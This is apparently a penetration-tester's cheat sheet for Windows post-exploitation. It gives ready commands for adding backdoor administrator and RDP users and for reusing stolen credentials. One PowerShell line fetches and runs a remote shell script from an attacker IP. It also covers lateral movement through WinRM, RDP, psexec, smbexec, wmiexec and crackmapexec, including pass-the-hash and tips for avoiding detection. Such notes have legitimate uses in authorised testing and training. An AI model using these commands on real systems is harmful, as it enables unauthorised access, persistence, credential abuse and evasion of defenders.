# Windows

## Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Windows systems.

## User

### Creating a user

```bash
net user <USERNAME> <PASSWORD> /add
```

### Add a user to a group

```bash
net localgroup Administrators <USERNAME> /add
```

### Add a user to the RDP group

By default, you cannot log in as a user through RDP unless it is a member of the "Remote Management Users" group.

```bash
net localgroup "Remote Management Users" <USERNAME> /add
```

### Powershell credentials and how to use them

If you have obtained some credentials and want to perform an action impersonating the actual account, you can use PowerShell.

```powershell
# Storing the credentials as variables
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred
```

## Recursive Grep (Powershell)

There is not a grep command on the Windows system, but thanks to PowerShell we can achieve something similar.

```powershell
Get-ChildItem -Recurse [-Include *.config,*.txt,*.ini] [-Exclude *.dll,*.exe,*.jar] | Select-String "<STRING>" -List | Select-Object -ExpandProperty Path | Out-String
# Shorter version
dir -recurse *.* | sls -pattern "foobar" | select -unique path
```

## Remote Command Execution

During a pentest, it is quite common to obtain credentials that can be used for getting access to other machines. However, most Windows machines will lack of CLI services like SSH to execute commands remotely. Nonetheless, there are other Windows services that can be used to perform the same actions.

### WinRM

**Port**: 5985

Windows Remote Management (WinRM) is a protocol that allows systems to access and exchange management information. An attacker can use this protocol to obtain RCE.

In order to check who can use the WinRM Protocol run the following command.

```powershell
(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission
# If the service is disable, you can enable with the following command
Enable-PSRemoting -Force  
```

During the session, the commands you type are executed on the remote computer, as if you were typing directly on the remote computer, but you can have only one interactive session at a time.

```powershell
$pass = ConvertTo-SecureString '<PASSWORD>' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $pass)
Enter-PSSession -Computername <IP> -Credential <CRENTIAL>
```

As an alternative, you can use tools like **evil-winrm** or **crackmapexec** to execute commands.

```bash
evil-winrm -u USERNAME {-p <PASSWORD> | -H <HASH>} -i TARGET_IP
crackmapexec winrm <IP> -d <Domain Name> -u <USER> {-H <HASH> | -p <PASSWORD>} -X 'whoami'
```

### Remote Desktop (RDP)

**Port**: 3389

If the user is a member of the "Remote Management Users" group and port 3389 is available, an attacker with the users' credentials could connect to the victim's computer.

```bash
rdesktop -u <USER> -p '<PASSWORD>' <IP>
xfreerdp +compression +toggle-fullscreen +clipboard /cert-ignore /dynamic-resolution  /u:<USERNAME> /p:'<PASSWORD>' /v:IP
```

> :warning: Use Impacket `tstool` to check if the user is already connected, avoiding been detected.
>
> ```bash
> impacket-tstool.py '<DOMAIN>/<USERNAME>:<PASSWORD>'@<IP> qwinsta
> SESSIONNAME  USERNAME                 ID  STATE         Desktop   ConnectTime          DisconnectTime
> ============ ======================== === ============= ========= ==================== ====================
> Services                              0   Disconnected            None                 None
> Console                               1   Connected     Locked    2025/03/02 13:52:43  None
> RDP-Tcp#0    .\Administrator          2   Active        Unlocked  2025/03/03 07:23:07  2025/03/03 07:23:07
> ```

* `/dynamic-resolution`: This allows us to change the size of the window, adjusting the resolution of the lens in the process.
* `/size: WIDTHxHEIGHT`: Set a specific size for machines that do not automatically resize with `/dynamic-resolution`.
* `+clipboard`: Enables the use of clipboards.
* `/drive:<LOCAL_DIRECTORY>,<SHARE_NAME>`: Creates a shared drive between the attacking machine and the target.

**Note:** A useful directory to share is the `/usr/share/windows-resources` directory in Kali, because it contains several Windows tools like Mimikatz.

### SMB

**Port**: 445

The SMB service can always allow an attacker to execute remote code against a windows system, as long as you have a valid account on that machine with sufficient permissions to create and run a service.

There are different tools that can achieve this goal, each one in its own way.

### PSEXEC

Uploads to `ADMIN$` a service binary with an arbitrary name. The obtained reverse shell is not interactive thus programs like PowerShell, vssadmin and plink will cause the service to fail.

Furthermore, there is a high probability of being detected by AVs or EDRs.

```bash
psexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
```

### SmbExec

Creates a service in the same way as psexec but it does not drop any binary on the host so it is stealthier than psexec. However, it is still a non-interactive shell.

```bash
smbexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
```

### Crackmapexec

```bash
# Execute Powershell
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -X '$PSVersionTable' 
# Excute command
crackmapexec smb 10.10.10.10 -u '<username>' -p '<password>' -x whoami 
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u '<username>' -H <NTHASH> -x whoami 
```

### WMiexec

It creates a semi-interactive shell without installing any service or agent, being the stealthiest of the before mentioned.

```bash
wmiexec.py [-hashes <LM:NT>] <DOMAIN>/<USERNAME>[:<PASSWORD]@<TARGET>
```